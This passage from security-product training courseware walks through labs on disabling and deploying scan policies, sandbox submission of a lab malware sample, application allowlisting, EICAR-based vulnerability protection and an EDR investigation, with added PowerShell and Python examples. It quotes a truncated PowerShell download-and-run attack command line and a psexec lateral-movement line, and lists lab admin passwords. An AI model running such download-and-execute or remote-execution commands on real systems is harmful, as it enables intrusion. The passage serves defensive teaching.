6 Click the Browse tab. Expand WIN2012 > Local Folder > Trend Micro Servers > ApexOne. Click the
Trend domain. In the right-hand pane, click to select CLIENT-02.

7 Click Add Selected Target , then OK.


8 Expand Real-time Scan Settings and click to disable Virus/Malware Scan.

9 Scroll down to the bottom of the list and click Deploy.

10 The Policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents. It may take some time for the policy to deploy. Click Refresh at the top of the policy list
to recheck the status.

11 Once applied to the target endpoints, the policy will display with a status of Deployed.

Exercise 6: Test the New Policy


In this exercise, the deployment of the policy will be confirmed on the target endpoint.
1 Open the VM-CLIENT-02 virtual machine.
2 Double-click the Security Agent icon in the system tray to display the console.
3 Since Real-time Scan was disabled in the policy, the Security Agent displays this status.

4 Click the Connection icon in the console. Note that Real-time Scan is disabled.

5 Close the Security Agent Console.

Lab 13: Submitting Suspicious Files for Analysis
In this lab, Connected Threat Defense will be enabled in Apex One. A sample malware variant will be
accessed and will be added to the Suspicious Objects list for blocking by Security Agents. Deep Discovery
Analyzer and Apex Central are already installed in the classroom environment for the following
exercises.

Estimated time to complete this lab: 40 minutes

Exercise 1: Register Deep Discovery Analyzer With Apex Central


In this first exercise, the Deep Discovery Analyzer device will be added to Apex Central as a Managed
Server.
1 In the VM-DC2016 virtual machine, open the Apex Central Web Management console and click
Administration > Managed Servers > Server Registration.
2 Add Deep Discovery Analyzer with the following server details:

• Server: https://192.168.4.5
• Display Name: Analyzer
• Product: Deep Discovery Analyzer
• User name: admin
• Password: Admin1234!
Click Save.

3 Deep Discovery Analyzer is now listed as a Managed Server.

Exercise 2: Add Deep Discovery Analyzer to the Product Directory


In this exercise, Deep Discovery Analyzer will be added to the Product Directory in Apex Central.
1 Still in Apex Central Web Management console, click Directories > Products.
2 Click Directory Management.

3 Expand the New Entity folder. Drag the Analyzer device to the Trend Micro Servers folder.

4 When prompted, click OK to acknowledge the move.

5 Deep Discovery Analyzer should be displayed in the Trend Micro Servers folder.

Exercise 3: Subscribe Apex One to the Suspicious Object List


1 Return to the Apex One Web Management console and click Administration > Settings >
Suspicious Object List.

2 In the Agent Settings section, verify that the URL, IP, File and Domain lists are enabled.
3 Click Test Connection. A success message should be displayed in the console window.

4 Click Save.

Exercise 4: Submit Suspicious Files


In this exercise, a suspicious file will be submitted to Deep Discovery Analyzer for sandbox analysis.
Predictive Machine Learning will be disabled beforehand, to ensure that the file is passed to Deep
Discovery Analyzer.
1 Return to the Agent Management list. Right-click the CLIENT-03 computer. Click Settings >
Predictive Machine Learning Settings.
2 Click to disable Predictive Machine Learning (this prevents it from interfering with this lab
exercise) and click Save.

3 A message is displayed confirming the configuration settings have been applied. Click Close.

4 Right-mouse click CLIENT-03 again and click Settings > Sample Submission.
5 Click to Enable suspicious file submission to Virtual Analyzer and click Save.

6 A message is displayed confirming the configuration settings have been applied. Click Close.

7 Open the VM-CLIENT-03 virtual machine and in a Web browser click the Detections bookmark or
type the following URL to access the sample malware site:
http://detection.trend.local
8 In the Connected Threat Defense section, click l1-1.doc and save it to the Windows 10 desktop.

Exercise 5: Track the Submission


1 Return to the DC2016 computer. In Windows Explorer, browse to the following folder and note
that a file passed from the Security Agent is waiting for submission to Deep Discovery Analyzer:
...\PCCSRV\TEMP\Sample Submission
2 Log into the Deep Discovery Analyzer Web Management console by entering the following URL
in a web browser, or by clicking the bookmark in the browser:
https://192.168.4.5
3 Log in with the following Deep Discovery Analyzer credentials when prompted:
• User name: admin
• Password: Admin1234!

4 Verify that the file has been submitted by the Apex One Server by clicking Virtual Analyzer >
Submitters. Apex One should be displayed (as OfficeScan) as the submitter of the object.

5 Click Virtual Analyzer > Submissions. On the Processing tab, verify that the l1-1 [1].doc file is being
processed by the Analyzer under today's date. There will be some delay before the file is
forwarded from the Apex One Server and processing by Deep Discovery Analyzer begins.

6 Once the analysis is complete, the entry moves to the Completed tab. There will be some delay
while the file is processed.

7 Click Virtual Analyzer > Suspicious Objects and verify that the object is now visible in the list.

8 Return to the Apex Central Web Management console and click Threat Intel > Virtual Analyzer
Suspicious Objects and verify that the object is now visible in the list. You may need to wait several
minutes for the results of the analysis to be passed to Apex Central.

9 Click to select the object in the list and click Configure Scan Action.

10 In the Scan Action window, select Block in the For selected files section and click Apply.

11 When prompted, confirm the application of the scan action. Click Apply Scan Action.

The Scan Action is changed to Block.

12 Back in the Apex One Web Management console, go to Administration > Settings > Suspicious
Object List.
13 Under the Suspicious Object List Subscription section, click Sync Now.

14 Return to the VM-CLIENT-03 virtual machine. In the System Tray in the lower right-hand corner
of the screen, right-click the Apex One icon and click Update.

15 On the VM-CLIENT-03 desktop, double-click the l1-1.doc malware sample that was saved in an
earlier step and click Run. This time, a suspicious file violation should be displayed.

16 Click the number link next to Suspicious Files in the Alert to view the log entry for the detection.
Click Close when done.

17 Return to the Apex One Web Management console and in the Agent Management list,
right-click the CLIENT-03 computer and click Logs > Suspicious Files Logs.
18 Accept the default log retrieval criteria and click Display Logs.

19 An entry should be displayed for the object with an Access Denied action.

20 Return to the Apex Central Web Management console and click Threat Intel > Virtual Analyzer
Suspicious Objects.

21 Select the object in the list, and click View.

22 Examine all the information provided for the different threat stages:
• Sample Submission
• Analysis
• Distribution
• Impact Analysis and Mitigation

23 Close the Apex Central and Deep Discovery Analyzer Web Management consoles.

Lab 14: Blocking Unauthorized Applications
In this lab, participants will enable Apex One Application Control to lock down the inventory of
applications on an endpoint computer and block any unauthorized applications from running. The
Application Control policy to do this will be configured and deployed through Apex Central.

Estimated time to complete this lab: 20 minutes

Exercise 1: Create a Policy


In this exercise, a new policy will be created to lock down the application inventory on the targeted
endpoint computer.
1 In the VM-DC2016 image, log into the Apex Central Web Management console and click Policies >
Policy Management.
2 In the Product list, select Apex One Security Agent and click Create to define the new policy.

3 Configure the policy with the following details:
• Name: Lockdown
• Target: Click Specify Target(s) and click Select.
- Click Browse and locate the DC2016 computer. Click to select it and click Add Selected
Target. Click OK.
4 Expand Application Control Settings and click to enable Application Control. Click to enable
Lockdown and disable Assessment mode.

5 Scroll to the bottom of the policy list and click Deploy.

6 The policy will display as Pending as it is deployed to the Security Agent on the DC2016
computer.

7 Once the policy is applied to the endpoint, the policy status will change to Deployed. It may take
some time for the policy to deploy as it generates the inventory. Click Refresh at the top of the
policy list to recheck the status.

8 Click the number 1 in the Deployed column to perform a log query to identify the endpoint
computers on which the policy was deployed.

Exercise 2: Test the Policy


In this exercise, a new application will be added to the endpoint to test the block. Since this application
was not part of the inventory when lockdown was enabled, it should be prevented from running.
1 On the VM-DC2016 virtual machine, open the Security Agent console to view the protection
status of this endpoint. Note that Application Control is enabled on this computer. A padlock
symbol may be displayed after a while to indicate that the endpoint is in Lockdown mode.

Note: If Application Control does not display as enabled (with the green icon), click Update in the
Security Agent console to force a refresh. The inventory process will take a few minutes to
complete on the endpoint computer; do not proceed to the next step until Application Control
shows as enabled.

2 Open the Lab Files folder on the desktop. Copy the WinMD5.exe file from this folder to the
C:\Temp folder on the DC2016 computer.
3 Once the file has been copied, double-click to execute the file.
4 A block message is displayed.

5 A policy violation message is displayed.

Exercise 3: Define Application Control Criteria


In this exercise, the blocked application will be allowed by adding a new Allow criterion.
1 Return to the Apex Central Web Management console.
2 Ensure that the latest Certified Safe Software Pattern is downloaded. Click
Administration > Updates > Manual Update and at the bottom of the list click Download Now.

Note: It will take a few minutes to download and refresh the list of components.

3 Once complete, expand Application Control and the up-to-date Certified Safe Software
Pattern should be displayed.

4 Click Policies > Policy Resources > Application Control Criteria. A single default criterion is
displayed. The Assess Gray Software List Applications criterion will be displayed once the
Certified Safe Software List Pattern has been downloaded.

5 Click Add Criteria and select Allow.

6 Create an Allow criterion with the following details:
• Name: Allow WinMD5
• Trust Permission: Application cannot execute external processes
• Match method: File Paths
- Specific path
- String
- C:\temp\winmd5.exe
Click Save.

7 The new Criteria is listed.
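The following PowerShell function is an added example, not part of this courseware, for gathering what identifies a binary before an Allow criterion is written for it. A File Paths match such as C:\temp\winmd5.exe admits whatever file happens to sit at that path, so outside a lab a criterion based on the file's hash or its signing certificate (where your Apex Central version offers those match methods) is the stronger choice; the function reports the SHA-1 and SHA-256 hashes and the Authenticode status to support that decision. The SHA-1 it prints is also the value to compare with a file entry on the Suspicious Objects list in Lab 13, on the assumption that the list identifies files by SHA-1. The paths are the lab's; nothing else is assumed.

```powershell
# Added example, not part of the Apex One courseware: collect the identifying
# facts about a binary (hashes, Authenticode status, publisher) before deciding
# how to allow it. Paths are the lab's; nothing else is assumed.

function Get-AllowlistEvidence {
    param([Parameter(Mandatory)][string]$Path)
    $item = Get-Item -LiteralPath $Path
    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $publisher = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(unsigned)' }
    # Suggested match strength, strongest first: publisher certificate (only when the
    # signature is Valid), then a file hash; a file path only as a last resort.
    $suggested = if ($sig.Status -eq 'Valid') { 'certificate match' } else { 'hash match' }
    [pscustomobject]@{
        Path      = $item.FullName
        SizeBytes = $item.Length
        SHA1      = (Get-FileHash -LiteralPath $Path -Algorithm SHA1).Hash
        SHA256    = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
        SigStatus = $sig.Status               # Valid, NotSigned, HashMismatch, UnknownError ...
        Publisher = $publisher
        Suggested = $suggested
    }
}

# The file copied in Exercise 2, then every executable in the same folder.
Get-AllowlistEvidence -Path 'C:\temp\WinMD5.exe' | Format-List

Get-ChildItem -LiteralPath 'C:\temp' -Filter *.exe -File |
    ForEach-Object { Get-AllowlistEvidence -Path $_.FullName } |
    Format-Table Path, SHA256, SigStatus, Suggested -AutoSize
```

Run it again after the tool is updated: a hash-based criterion must be refreshed for every new build, whereas a certificate-based one survives updates signed by the same publisher, which is the trade-off to weigh when choosing between them.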

8 Return to Policies > Policy Management. Click the Lockdown policy and expand Application
Control Settings.
9 In the User-Defined Rules section, click the All user accounts rule. The policy criteria are
displayed in the Available criteria column.

10 Click each criterion one at a time to move it into the Selected criteria column and click OK.

11 Scroll down and click Deploy. Wait until the new policy is deployed before proceeding to the next
exercise.

Exercise 4: Test the Allow Rule


In this exercise, the previously blocked application will be launched once again to test the Allow criteria.
1 In Windows Explorer, navigate to the C:\temp folder and double-click WinMD5.exe.
2 The application should run.

Exercise 5: View the Application Control Log Entry


In this exercise, the log entry related to the Application Control incident will be reviewed.
1 Return to the Apex Central Web Management console and click Detections > Logs > Log Query.
2 Select Application Control violations and click OK.

3 Leave the other items at their default and click Search.

4 The log entry related to the Application Control violation on the DC2016 computer is displayed. It
may take some time for the log entry to display.

5 Close the VM-DC2016 virtual machine.

Lab 15: Protecting Endpoint Computers from Vulnerabilities
In this lab, participants will enable Apex One Vulnerability Protection to protect an endpoint computer
from operating system exploits.

Estimated time to complete this lab: 20 minutes

Exercise 1: Enable Vulnerability Protection


In this exercise, vulnerability protection will be enabled for a single computer.
1 Open the VM-DC2016 virtual machine and log into the Apex Central Web Management console.
2 Click Administration > Updates > Manual Update. Expand Intrusion Prevention and note that the
Vulnerability Protection Pattern has been downloaded. This pattern is updated regularly and
contains the rules that protect the endpoint from vulnerabilities.

3 Click Policies > Policy Resources > Intrusion Prevention Rules. The IPS rules currently downloaded
are displayed.

4 Click Policies > Policy Management and delete the policy called No Scan.
5 Still under Policies > Policy Management, create a new policy for the Security Agent with the
following details:
• Name: Protect Client-02
• Filter: Specify Target and click Select
- Click Browse and expand the tree to display the endpoint computers. Select CLIENT-02
and click Add Selected Targets. Click OK.

6 Expand Vulnerability Protection Settings and ensure that Enable Vulnerability Protection is
selected. Click to enable Security Priority mode.

7 In the Search field, type eicar. The Restrict Download of EICAR Test File Over HTTP rule is
displayed. Note that this rule is enabled automatically in Security Priority mode. It lets you
confirm that the vulnerability rules are being enforced on the endpoint computer; as its name
indicates, it inspects clear-text HTTP, so the test in the next exercise must use an http:// URL.

8 Scroll to the bottom of the list and click Deploy. The rules are then deployed to the Security
Agent on the CLIENT-02 computer. Wait until the policy is deployed before continuing.

Exercise 2: Test Vulnerability Protection


In this exercise, the EICAR sample file will be downloaded to trigger the Vulnerability Protection rule.

1 Open the VM-CLIENT-02 image and confirm that Vulnerability Protection has been deployed.

2 In a Web browser on the CLIENT-02 computer, type the following URL to download the EICAR test
file:
http://2016.eicar.org/85-0-Download.html
3 Click the eicar.com file to download.

4 The connection to the Web page should be reset and a browser error displayed.

Exercise 3: View the Vulnerability Protection Log Entry


In this exercise, the log entry related to the Vulnerability Protection incident will be reviewed.
1 Return to the Apex Central Web Management console.
2 Click Detections > Logs > Log Query. In the Log Query window, set the query to Intrusion
Prevention, leave the remaining options at their default and click Search.

Lab 16: Endpoint Detection and Response
In this lab, participants will deploy a policy using Endpoint Sensor within the classroom lab environment.
Participants will then run a preliminary investigation using Endpoint Detection and Response in a trial
environment to track the steps in an attack.

Estimated time to complete this lab: 20 minutes

Exercise 1: Deploy the Endpoint Sensor License


Endpoint Sensor, used in conjunction with Endpoint Detection and Response, is licensed separately from
Apex One and requires a unique activation code. In this exercise, the activation code for Endpoint Sensor
will be deployed in the lab environment.
1 Open the VM-DC2016 virtual machine and log into Apex Central Web Management console. Click
Administration > License Management > Managed Products. A single license should be displayed.
Click Add and Deploy.

2 You will be prompted to enter the new activation code.

Open the Product Cloud activation code.txt file in the Lab Files folder and copy and
paste the Endpoint Sensor activation code into the Web form and click Next.

3 In the Select Product for Activation Code frame, expand the tree and click ApexOne. Click
Deploy.

4 A message is displayed in Apex Central indicating that it may take some time to deploy the
activation code.

5 When the Activated Products column displays one product for the new license, click the number
1 in the column.

6 In the Managed Service column, note that Apex One: Endpoint Sensor is listed.

Exercise 2: Deploy a Policy using Endpoint Sensor


In this exercise, a new policy will be created to deploy Endpoint Sensor on the endpoints in the lab
environment.
1 Still in the Apex Central Web Management console, click Policies > Policy Management.
2 Delete the Protect Client-02 policy in the list for the Apex One Security Agent.
3 Click Create to define a new policy.
4 The policy template window is displayed. Type a name for the policy, for example, Endpoint
Sensor.
5 Click Specify Target(s) and click Select.
6 Click Browse and expand the tree to display the endpoints. Select CLIENT-02 and CLIENT-03 and
click Add Selected Targets, then OK.

7 Expand Endpoint Sensor Settings and configure the policy settings as follows:
• Enable Endpoint Sensor: selected
• Enable Event recording: selected
• Send a subset of log data to perform preliminary investigation: selected
• Upload frequency: Every 15 minutes
• Enable Attack Discovery to detect known attack indicators on endpoints: selected

8 Scroll down to the bottom of the list and click Deploy.

9 The Policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents. Once applied to the target endpoints, the policy will display with a status of Deployed.

Exercise 3: Verify the New Policy


In this exercise, the deployment of the policy will be verified on the target endpoint.
1 Open the VM-CLIENT-02 virtual machine.
2 Double-click the Security Agent icon in the system tray to display the console.

3 Click the Connection icon in the console and confirm that Endpoint Sensor is enabled.
4 Close the Security Agent Console.

Exercise 4: Investigate a Security Incident


The Endpoint Sensor has been deployed in the classroom environment; however, it will take some time
to accumulate data on endpoint activity before an investigation can be performed. An environment
has been pre-configured with attack data so that participants can test an Endpoint Detection and
Response scenario.

Note: During the trial, you may be prompted to extend the trial period. If this occurs, click the Back
button in the browser to clear this message.

1 Still on the VM-DC2016 virtual machine, open Google Chrome and click the Trial Cloud bookmark
in the browser. Alternatively, type the following URL in Chrome:
https://trial.productcloud.trendmicro.com/auth/apex?socialRef=a3b8feb4
Click Start my trial.
2 A floating pane with instructions on using the trial is displayed. Click the arrow to advance through the
instructions, or click Skip.
3 A list of sample scenarios is presented in the sidebar on the right-hand side of the window. Click
scenario 2-Endpoint Detection and Response.
4 Instructions for the scenario are listed in the sidebar or follow these written instructions.
5 Make sure you are on the Apex Central VM. Double-click the Control Manager shortcut on the
desktop to log in to the Apex Central Web Management console. When prompted, enter the
credentials as follows:
• Username: root
• Password: Tr3ndM1cr0!
Click Log on.

6 Click Response > Preliminary Investigation. Under Custom criteria, click +Add criteria and select
User account. Type the user account name johndoe and click the Assess button.

7 The assessment returns one affected machine called WIN7CLIENT. Click the checkbox to select
WIN7CLIENT and click Generate Root Cause Analysis.

8 Provide the necessary details for the analysis report as follows:


• Name: Classroom Report
• Period: All
Click Generate to launch the Root Cause Analysis task.

9 For your convenience, a Root Cause Analysis for this scenario has already been run and it is
displayed in the list as Erroneous User. We will use this to proceed with the investigation. Click
the completed task called Erroneous User to view the Root Cause Analysis result page.

From here, you can view information like Target Endpoint, First Observed Object, Matched
Objects, Noteworthy Objects, and the Attack Chain view.

Note the First Observed Object is an application called PSEXESVC.exe, meaning the attack
originated from a remote PC.

10 From the attack chain view, click the cmd.exe object to view information about the object
including:
• User: WIN7CLIENT\JohnDoe
• Command line: “cmd” /c powershell -c “&{(New-Object Net.WebClient).Downloadfile...
From the command line, we can deduce that the attack was run from a remote PC with the
PSEXEC tool using an erroneous user account JohnDoe.
Close the tab with the Erroneous User report.
11 Click Response > Preliminary Investigations and run a new Custom criteria investigation with the
following details, and click Assess.
• Criteria: Command line
• Criteria details: johndoe
The assessment result now returns two affected machines (WIN10CLIENT and WIN7CLIENT).

12 From the assessment results, click the icon in the Details column for WIN10CLIENT to open the
Match Details window.

Click the number in the CLI/Registry Occurrences column to view the details of all command lines run
from WIN10CLIENT.

From here, we can see more command lines executed from the WIN10CLIENT.

Based on these findings, we can interpret that the WIN10CLIENT was actually the compromised
machine and WIN7CLIENT was the affected machine.
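The reasoning in steps 6 through 12 (assess by user account, assess by command line, walk the attack chain back to the first observed object, and decide which host was the origin) can be shown on a small set of process events. The following is an added example, not Apex One code, and the event format, field names and telemetry rows are constructed assumptions that mirror the lab scenario (WIN10CLIENT, WIN7CLIENT, account JohnDoe, first observed object PSEXESVC.exe). The rule that a chain rooted at PSEXESVC.exe was started from another machine is the same inference the lab draws in step 9.

```python
"""Constructed walk-through of the Exercise 4 triage logic.

Added example: not Apex One's event format, API or algorithm. All events,
field names and the REMOTE_SERVICE_IMAGES rule are assumptions built to
mirror the lab scenario.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    pid: int
    parent_pid: Optional[int]   # None when the sensor recorded no local parent
    image: str
    user: str                   # DOMAIN\account as recorded by the sensor
    cmdline: str


# Constructed sample telemetry: one process-start event per row.
EVENTS: List[ProcessEvent] = [
    # WIN10CLIENT: an interactive session launches a remote-execution tool.
    ProcessEvent("WIN10CLIENT", 100, None, "explorer.exe", r"WIN10CLIENT\Alice", "explorer.exe"),
    ProcessEvent("WIN10CLIENT", 200, 100, "cmd.exe", r"WIN10CLIENT\Alice", "cmd.exe"),
    ProcessEvent("WIN10CLIENT", 300, 200, "psexec.exe", r"WIN10CLIENT\Alice",
                 r"psexec.exe \\WIN7CLIENT -u johndoe cmd /c powershell ..."),
    # WIN7CLIENT: the service half of the tool starts with no local parent and
    # spawns the chain the lab shows in the Root Cause Analysis view.
    ProcessEvent("WIN7CLIENT", 400, None, "PSEXESVC.exe", r"NT AUTHORITY\SYSTEM", "PSEXESVC.exe"),
    ProcessEvent("WIN7CLIENT", 500, 400, "cmd.exe", r"WIN7CLIENT\JohnDoe",
                 '"cmd" /c powershell -c "&{(New-Object Net.WebClient).Downloadfile...'),
    ProcessEvent("WIN7CLIENT", 600, 500, "powershell.exe", r"WIN7CLIENT\JohnDoe",
                 r"powershell -c ... C:\Users\JohnDoe\SensorTest.exe"),   # payload elided
    ProcessEvent("WIN7CLIENT", 700, 600, "SensorTest.exe", r"WIN7CLIENT\JohnDoe",
                 r"C:\Users\JohnDoe\SensorTest.exe"),
]

# Assumption: images whose presence as the first observed object means the
# chain was started from another machine (the lab's PSEXESVC.exe reasoning).
REMOTE_SERVICE_IMAGES = {"psexesvc.exe"}


def assess(events: List[ProcessEvent], criterion: str, value: str) -> Set[str]:
    """Preliminary-investigation style assessment: hosts with at least one
    event matching the criterion (case-insensitive)."""
    needle = value.lower()
    hits: Set[str] = set()
    for ev in events:
        if criterion == "user_account":
            matched = ev.user.split("\\")[-1].lower() == needle
        elif criterion == "command_line":
            matched = needle in ev.cmdline.lower()
        else:
            raise ValueError(f"unsupported criterion: {criterion}")
        if matched:
            hits.add(ev.host)
    return hits


def attack_chain(events: List[ProcessEvent], host: str, pid: int) -> List[str]:
    """Follow parent links from pid up to the first observed object and return
    the image names, root first. A seen-set guards against cyclic pid reuse."""
    by_pid = {ev.pid: ev for ev in events if ev.host == host}
    chain: List[str] = []
    seen: Set[int] = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image)
        cur = by_pid.get(cur.parent_pid) if cur.parent_pid is not None else None
    chain.reverse()
    return chain


def first_observed_object(events: List[ProcessEvent], host: str, pid: int) -> str:
    chain = attack_chain(events, host, pid)
    return chain[0] if chain else ""


def classify_hosts(events: List[ProcessEvent], value: str) -> Dict[str, str]:
    """For each host matched on command line, label it 'affected' when every
    matching chain was started remotely, else 'origin' (the compromised host)."""
    result: Dict[str, str] = {}
    for ev in events:
        if value.lower() not in ev.cmdline.lower():
            continue
        root = first_observed_object(events, ev.host, ev.pid)
        verdict = "affected" if root.lower() in REMOTE_SERVICE_IMAGES else "origin"
        if result.get(ev.host) != "origin":   # one local launch makes it the origin
            result[ev.host] = verdict
    return result


if __name__ == "__main__":
    print("user account johndoe ->", sorted(assess(EVENTS, "user_account", "johndoe")))
    print("command line johndoe ->", sorted(assess(EVENTS, "command_line", "johndoe")))
    print("WIN7CLIENT chain ->", " > ".join(attack_chain(EVENTS, "WIN7CLIENT", 700)))
    print("verdicts ->", classify_hosts(EVENTS, "johndoe"))
```

The user-account assessment returns only WIN7CLIENT, as in step 7, while the command-line assessment returns both hosts, as in step 11; the chain on WIN7CLIENT starts at PSEXESVC.exe, so the host is labelled affected and WIN10CLIENT, whose matching chain starts under its own interactive session, is labelled the origin. Note that with the lab's policy setting of uploading a subset of log data every 15 minutes, real assessments see only what has been uploaded so far.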

Exercise 5: Responding to the Incident


In this exercise, an incident response will be performed to immediately limit the damage on the
compromised and affected endpoints.
1 Still in the Apex Central Web Management console, click Response > Preliminary Investigations
and click the Root Cause Analysis Results tab.
2 Click the completed task called Erroneous User to view the Root Cause Analysis result page.
3 Under the Target Endpoint column, click Isolate Endpoint. This will stop all network connections
on the endpoint and it will only be able to communicate with the server while performing
investigations.

4 The Apex One agent displays a pop-up alert stating that the endpoint will be isolated. Click Isolate
Endpoint.

5 In the Noteworthy Objects column, hover over the number to display all objects that were
marked as Suspicious or Malicious. Legend information for each object is available by hovering
over the legend icon (i) on the lower left side of the Analysis Chains page.
• Black: Normal Object
• Gray: Unrated Object
• Orange: Suspicious Object
• Red: Malicious Object

6 In the Analysis Chain view, you should see one (1) suspicious object (SensorTest.exe). Click it
to view the Incident Response options.

• Terminate Object: Remotely terminates the process.


• Add to Suspicious Objects List: Adds the item to User-defined Suspicious Objects to prevent
file access and execution.
• Add to Preliminary Investigation List: Starts a new preliminary investigation with the criterion
File name = Suspicious.exe
Close the tab with the Erroneous User report.

Exercise 6: Restore Endpoint Connectivity


In this exercise, the isolated endpoint will be reconnected back to the network.
1 Still in the Apex Central Web Management console, click Directories > Users/Endpoints.

2 Expand Endpoints and double-click All in the left-hand pane, then click to select the
WIN7CLIENT endpoint.

3 Click Task > Restore.
